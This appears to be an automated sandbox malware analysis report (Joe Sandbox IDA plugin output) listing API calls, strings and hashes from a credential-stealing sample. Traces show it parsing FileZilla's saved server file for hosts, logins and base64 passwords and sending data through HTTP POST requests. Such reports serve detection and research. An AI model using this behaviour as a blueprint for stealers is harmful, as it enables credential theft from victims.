GetProcAddress.KERNEL32(75A70000,0132FBD0), ref: 00EF82B6
GetProcAddress.KERNEL32(75A70000,0132FBE8), ref: 00EF82CF
GetProcAddress.KERNEL32(75A70000,0132FBA0), ref: 00EF82E7
GetProcAddress.KERNEL32(75450000,01328118), ref: 00EF8308
GetProcAddress.KERNEL32(75450000,01328218), ref: 00EF8321
GetProcAddress.KERNEL32(75DA0000,01328238), ref: 00EF8342
GetProcAddress.KERNEL32(75DA0000,0132FC18), ref: 00EF835A
GetProcAddress.KERNEL32(6F090000,01328398), ref: 00EF8380
GetProcAddress.KERNEL32(6F090000,013283B8), ref: 00EF8398
GetProcAddress.KERNEL32(6F090000,01328418), ref: 00EF83B0
GetProcAddress.KERNEL32(6F090000,0132FB88), ref: 00EF83C9
GetProcAddress.KERNEL32(6F090000,01328278), ref: 00EF83E1
GetProcAddress.KERNEL32(6F090000,013283D8), ref: 00EF83F9
GetProcAddress.KERNEL32(6F090000,013280D8), ref: 00EF8412
GetProcAddress.KERNEL32(6F090000,01328138), ref: 00EF842A
GetProcAddress.KERNEL32(75AF0000,013300E0), ref: 00EF844B
GetProcAddress.KERNEL32(75AF0000,0132D4E8), ref: 00EF8464
GetProcAddress.KERNEL32(75AF0000,013301E8), ref: 00EF847C
GetProcAddress.KERNEL32(75AF0000,01330158), ref: 00EF8494
GetProcAddress.KERNEL32(75D90000,013283F8), ref: 00EF84B6
GetProcAddress.KERNEL32(6CEB0000,01330188), ref: 00EF84D7
GetProcAddress.KERNEL32(6CEB0000,013280B8), ref: 00EF84EF
GetProcAddress.KERNEL32(6CEB0000,0132FFA8), ref: 00EF8508
GetProcAddress.KERNEL32(6CEB0000,013300F8), ref: 00EF8520

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 20c79ae1f8c492803521dad9755b9b135877a765ba35db6d15e8505165786593
Instruction ID: 2dac376377deb379b61cba3a0dcfec3b27ae5157817f52dbef46877240924746
Opcode Fuzzy Hash: 20c79ae1f8c492803521dad9755b9b135877a765ba35db6d15e8505165786593
Instruction Fuzzy Hash: 9D6242B5D50600AFC7AEDFA8F58891637BAB74C251710853DA629C324CDBF998D1CF22

Function 00EE7110 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00EF42AE,?), ref: 00EE7124
RtlAllocateHeap.NTDLL(00000000,?,00EF42AE,?), ref: 00EE712B
lstrcat.KERNEL32(?,0132CDD8), ref: 00EE72DB
lstrcat.KERNEL32(?,?), ref: 00EE72EF
lstrcat.KERNEL32(?,?), ref: 00EE7303
lstrcat.KERNEL32(?,?), ref: 00EE7317
lstrcat.KERNEL32(?,0132FC78), ref: 00EE732B
lstrcat.KERNEL32(?,0132FD98), ref: 00EE733F
lstrcat.KERNEL32(?,0132FF48), ref: 00EE7352
lstrcat.KERNEL32(?,0132FEE8), ref: 00EE7366
lstrcat.KERNEL32(?,0132CE60), ref: 00EE737A
lstrcat.KERNEL32(?,?), ref: 00EE738E
lstrcat.KERNEL32(?,?), ref: 00EE73A2
lstrcat.KERNEL32(?,?), ref: 00EE73B6
lstrcat.KERNEL32(?,0132FC78), ref: 00EE73C9
lstrcat.KERNEL32(?,0132FD98), ref: 00EE73DD
lstrcat.KERNEL32(?,0132FF48), ref: 00EE73F1
lstrcat.KERNEL32(?,0132FEE8), ref: 00EE7404
lstrcat.KERNEL32(?,01331040), ref: 00EE7418
lstrcat.KERNEL32(?,?), ref: 00EE742C
lstrcat.KERNEL32(?,?), ref: 00EE7440
lstrcat.KERNEL32(?,?), ref: 00EE7454
lstrcat.KERNEL32(?,0132FC78), ref: 00EE7468
lstrcat.KERNEL32(?,0132FD98), ref: 00EE747B
lstrcat.KERNEL32(?,0132FF48), ref: 00EE748F
lstrcat.KERNEL32(?,0132FEE8), ref: 00EE74A3
lstrcat.KERNEL32(?,013310A8), ref: 00EE74B6
lstrcat.KERNEL32(?,?), ref: 00EE74CA
lstrcat.KERNEL32(?,?), ref: 00EE74DE
lstrcat.KERNEL32(?,?), ref: 00EE74F2
lstrcat.KERNEL32(?,0132FC78), ref: 00EE7506
lstrcat.KERNEL32(?,0132FD98), ref: 00EE751A
lstrcat.KERNEL32(?,0132FF48), ref: 00EE752D
lstrcat.KERNEL32(?,0132FEE8), ref: 00EE7541
lstrcat.KERNEL32(?,01331110), ref: 00EE7555
lstrcat.KERNEL32(?,?), ref: 00EE7569
lstrcat.KERNEL32(?,?), ref: 00EE757D
lstrcat.KERNEL32(?,?), ref: 00EE7591
lstrcat.KERNEL32(?,0132FC78), ref: 00EE75A4
lstrcat.KERNEL32(?,0132FD98), ref: 00EE75B8
lstrcat.KERNEL32(?,0132FF48), ref: 00EE75CC
lstrcat.KERNEL32(?,0132FEE8), ref: 00EE75DF
lstrcat.KERNEL32(?,01331178), ref: 00EE75F3
lstrcat.KERNEL32(?,?), ref: 00EE7607
lstrcat.KERNEL32(?,?), ref: 00EE761B
lstrcat.KERNEL32(?,?), ref: 00EE762F
lstrcat.KERNEL32(?,0132FC78), ref: 00EE7643
lstrcat.KERNEL32(?,0132FD98), ref: 00EE7656
lstrcat.KERNEL32(?,0132FF48), ref: 00EE766A
lstrcat.KERNEL32(?,0132FEE8), ref: 00EE767E

Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020,00EFF04C), ref: 00EE7006
Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020,00000000), ref: 00EE7048
Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020, : ), ref: 00EE705A
Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020,00000000), ref: 00EE708F
Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020,00EFF054), ref: 00EE70A0
Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020,00000000), ref: 00EE70D3
Part of subcall function 00EE6FD0: lstrcat.KERNEL32(2DA1B020,00EFF058), ref: 00EE70ED
Part of subcall function 00EE6FD0: task.LIBCPMTD ref: 00EE70FB

lstrcat.KERNEL32(?,0132D748), ref: 00EE780B
lstrcat.KERNEL32(?,01330D68), ref: 00EE781E
lstrlen.KERNEL32(2DA1B020), ref: 00EE782B
lstrlen.KERNEL32(2DA1B020), ref: 00EE783B

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EE4DE0: lstrlen.KERNEL32(00000000), ref: 00EE4E6A
Part of subcall function 00EE4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
Part of subcall function 00EE4DE0: StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 3408801d6069072da8b8f8dfe9c1602c34d09b7387cef56086bd7fbe956e84a8
Instruction ID: 1560259531cdabb857fa39e4ff6f84f6fba141cfe7d092bb517dc4db0036a46d
Opcode Fuzzy Hash: 3408801d6069072da8b8f8dfe9c1602c34d09b7387cef56086bd7fbe956e84a8
Instruction Fuzzy Hash: 633237B6D01258ABCB29EB60DC85DEF73BDAB44741F404AA8F31966084DBB4E784CF50

Function 00EEF920 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE93EC
Part of subcall function 00EE93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9411
Part of subcall function 00EE93C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9431
Part of subcall function 00EE93C0: ReadFile.KERNEL32(000000FF,?,00000000,00EEF9B7,00000000), ref: 00EE945A
Part of subcall function 00EE93C0: LocalFree.KERNEL32(00EEF9B7), ref: 00EE9490
Part of subcall function 00EE93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EE949A

Part of subcall function 00EF6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF6D62

strtok_s.MSVCRT ref: 00EEF9EB
GetProcessHeap.KERNEL32(00000000,000F423F,00EFE792,00EFE78F,00EFE78E,00EFE78B), ref: 00EEFA32
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFE78A), ref: 00EEFA39
StrStrA.SHLWAPI(00000000,<Host>), ref: 00EEFA55
lstrlen.KERNEL32(00000000), ref: 00EEFA63

Part of subcall function 00EF67B0: malloc.MSVCRT ref: 00EF67B8
Part of subcall function 00EF67B0: strncpy.MSVCRT ref: 00EF67D3

StrStrA.SHLWAPI(00000000,<Port>), ref: 00EEFA9F
lstrlen.KERNEL32(00000000), ref: 00EEFAAD
StrStrA.SHLWAPI(00000000,<User>), ref: 00EEFAE9
lstrlen.KERNEL32(00000000), ref: 00EEFAF7
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EEFB33
lstrlen.KERNEL32(00000000), ref: 00EEFB45
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFE78A), ref: 00EEFBD2
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 00EEFBEA
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 00EEFC02
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 00EEFC1A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EEFC32
lstrcat.KERNEL32(?,profile: null), ref: 00EEFC41
lstrcat.KERNEL32(?,url: ), ref: 00EEFC50
lstrcat.KERNEL32(?,00000000), ref: 00EEFC63
lstrcat.KERNEL32(?,00EFEEC8), ref: 00EEFC72
lstrcat.KERNEL32(?,00000000), ref: 00EEFC85
lstrcat.KERNEL32(?,00EFEECC), ref: 00EEFC94
lstrcat.KERNEL32(?,login: ), ref: 00EEFCA3
lstrcat.KERNEL32(?,00000000), ref: 00EEFCB6
lstrcat.KERNEL32(?,00EFEED8), ref: 00EEFCC5
lstrcat.KERNEL32(?,password: ), ref: 00EEFCD4
lstrcat.KERNEL32(?,00000000), ref: 00EEFCE7
lstrcat.KERNEL32(?,00EFEEE8), ref: 00EEFCF6
lstrcat.KERNEL32(?,00EFEEEC), ref: 00EEFD05
strtok_s.MSVCRT ref: 00EEFD49
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFE78A), ref: 00EEFD5E
memset.MSVCRT ref: 00EEFDA7

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00EEF974
<User>, xrefs: 00EEFAE0
browser: FileZilla, xrefs: 00EEFC29
<Pass encoding="base64">, xrefs: 00EEFB2A
<Port>, xrefs: 00EEFA96
password: , xrefs: 00EEFCCB
login: , xrefs: 00EEFC9A
profile: null, xrefs: 00EEFC38
<Host>, xrefs: 00EEFA4C
url: , xrefs: 00EEFC47

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 74b177885d9de0dc19072293bffbe1ddf474c1b424e5791c7c6f50a92bd3b15d
Instruction ID: b0121e03421822124a6999b3b5c40adb120131c64e9342422806572b37c4ae88
Opcode Fuzzy Hash: 74b177885d9de0dc19072293bffbe1ddf474c1b424e5791c7c6f50a92bd3b15d
Instruction Fuzzy Hash: 07D1097190020CABCF18EBE4DE56EFE7778AF14301F509468F206B6195EF74AA48CB65

Function 00EE4DE0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4516
Part of subcall function 00EE4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4526

lstrlen.KERNEL32(00000000), ref: 00EE4E6A

Part of subcall function 00EF6DB0: CryptBinaryToStringA.CRYPT32(00000000,^N,40000001,00000000,00000000), ref: 00EF6DD0

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4EDB
StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE4EF9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE5014
HttpOpenRequestA.WININET(00000000,0132D6C8,?,013315E8,00000000,00000000,00400100,00000000), ref: 00EE5078

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0132D678,00000000,?,01324BC8,00000000,?,00EFF22C,00000000,?,00EF1976), ref: 00EE540B
lstrlen.KERNEL32(00000000), ref: 00EE541F
GetProcessHeap.KERNEL32(00000000,?), ref: 00EE5430
HeapAlloc.KERNEL32(00000000), ref: 00EE5437
lstrlen.KERNEL32(00000000), ref: 00EE544C
memcpy.MSVCRT ref: 00EE5463
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE547D
memcpy.MSVCRT ref: 00EE548A
lstrlen.KERNEL32(00000000), ref: 00EE549C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE54B5
memcpy.MSVCRT ref: 00EE54C5
lstrlen.KERNEL32(00000000,?,?), ref: 00EE54E2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE54F6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EE5521
InternetCloseHandle.WININET(00000000), ref: 00EE5585
InternetCloseHandle.WININET(00000000), ref: 00EE5592
InternetCloseHandle.WININET(00000000), ref: 00EE559C

Strings

------, xrefs: 00EE4F6B
------, xrefs: 00EE51CD
------, xrefs: 00EE508B
------, xrefs: 00EE530F
", xrefs: 00EE5298
", xrefs: 00EE5156
--, xrefs: 00EE4F54
", xrefs: 00EE53DA

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2633831070-2774362122
Opcode ID: a9f248775d993a2b5f1012e8878d179d669f9a5cde765709e8d1bfff13759fcb
Instruction ID: 42e28f977b394df111f17e4a86bae677d79c6a85cedecafd1e8957801c5ba383
Opcode Fuzzy Hash: a9f248775d993a2b5f1012e8878d179d669f9a5cde765709e8d1bfff13759fcb
Instruction Fuzzy Hash: 8532DB7292011CAADF19EBA0DD95FFEB3B8BF54700F4051A9B206B2491DF706A48CF65

Function 00EE5630 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4516
Part of subcall function 00EE4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4526

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE56C8
StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE56E3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE5863
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,0132D7B8,00000000,?,01324BC8,00000000,?,00EFF26C), ref: 00EE5B3E
lstrlen.KERNEL32(00000000), ref: 00EE5B4F
GetProcessHeap.KERNEL32(00000000,?), ref: 00EE5B60
HeapAlloc.KERNEL32(00000000), ref: 00EE5B67
lstrlen.KERNEL32(00000000), ref: 00EE5B7C
memcpy.MSVCRT ref: 00EE5B93
lstrlen.KERNEL32(00000000), ref: 00EE5BA5
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE5BBE
memcpy.MSVCRT ref: 00EE5BCB
lstrlen.KERNEL32(00000000,?,?), ref: 00EE5BE8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE5BFC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EE5C19
InternetCloseHandle.WININET(00000000), ref: 00EE5C7D
InternetCloseHandle.WININET(00000000), ref: 00EE5C8A
HttpOpenRequestA.WININET(00000000,0132D6C8,?,013315E8,00000000,00000000,00400100,00000000), ref: 00EE58C8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

InternetCloseHandle.WININET(00000000), ref: 00EE5C94

Strings

", xrefs: 00EE5AE6
", xrefs: 00EE59A5
------, xrefs: 00EE5A1C
------, xrefs: 00EE58DB
------, xrefs: 00EE5766

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 148854478-2180234286
Opcode ID: d64d49f3d9d9c1c30dfb08dcaba12504989cff5edb654c029f940227fc06b714
Instruction ID: a4fdaa32ad17d30e80054d72a44cc3c0644e8bc23b09cd31c3cb7712ad33275f
Opcode Fuzzy Hash: d64d49f3d9d9c1c30dfb08dcaba12504989cff5edb654c029f940227fc06b714
Instruction Fuzzy Hash: 78129D7291011CAACF19EFA0DD95FEEB3B8BF14700F5051A9B206B6491EF706A48CF65

Function 00EEA050 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF8890: StrCmpCA.SHLWAPI(00000000,00EFECC0,00EEC922,00EFECC0,00000000), ref: 00EF88AF

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EEA382
RtlAllocateHeap.NTDLL(00000000), ref: 00EEA389
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EEA16A

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

lstrcat.KERNEL32(?,00000000), ref: 00EEA4CA
lstrcat.KERNEL32(?,00EFEB70), ref: 00EEA4D9
lstrcat.KERNEL32(?,00000000), ref: 00EEA4EC
lstrcat.KERNEL32(?,00EFEB74), ref: 00EEA4FB
lstrcat.KERNEL32(?,00000000), ref: 00EEA50E
lstrcat.KERNEL32(?,00EFEB78), ref: 00EEA51D
lstrcat.KERNEL32(?,00000000), ref: 00EEA530
lstrcat.KERNEL32(?,00EFEB7C), ref: 00EEA53F
lstrcat.KERNEL32(?,00000000), ref: 00EEA552
lstrcat.KERNEL32(?,00EFEB80), ref: 00EEA561
lstrcat.KERNEL32(?,00000000), ref: 00EEA574
lstrcat.KERNEL32(?,00EFEB84), ref: 00EEA583

Part of subcall function 00EE9800: memcmp.MSVCRT ref: 00EE981B
Part of subcall function 00EE9800: memset.MSVCRT ref: 00EE984E
Part of subcall function 00EE9800: LocalAlloc.KERNEL32(00000040,?), ref: 00EE989E

lstrcat.KERNEL32(?,00000000), ref: 00EEA5CC
lstrcat.KERNEL32(?,00EFEB88), ref: 00EEA5E6
lstrlen.KERNEL32(?), ref: 00EEA625
lstrlen.KERNEL32(?), ref: 00EEA634
memset.MSVCRT ref: 00EEA67D

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

DeleteFileA.KERNEL32(00000000), ref: 00EEA6A9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 0a399c85d09824d478434c03bf2eb611eecfd4e19e6c19c70f96e97fe1616bc6
Instruction ID: 9b6a27b9e6a103e5a6dfc3866a68b7d16fa7d1740076657910aff8817b8e62c2
Opcode Fuzzy Hash: 0a399c85d09824d478434c03bf2eb611eecfd4e19e6c19c70f96e97fe1616bc6
Instruction Fuzzy Hash: DA022E7190011CABCF19EFA0DE96EFE73B9AF14301F5051A9B206B6095EF74AE44CB61

Function 00EE4560 Relevance: 32.0, APIs: 11, Strings: 7, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

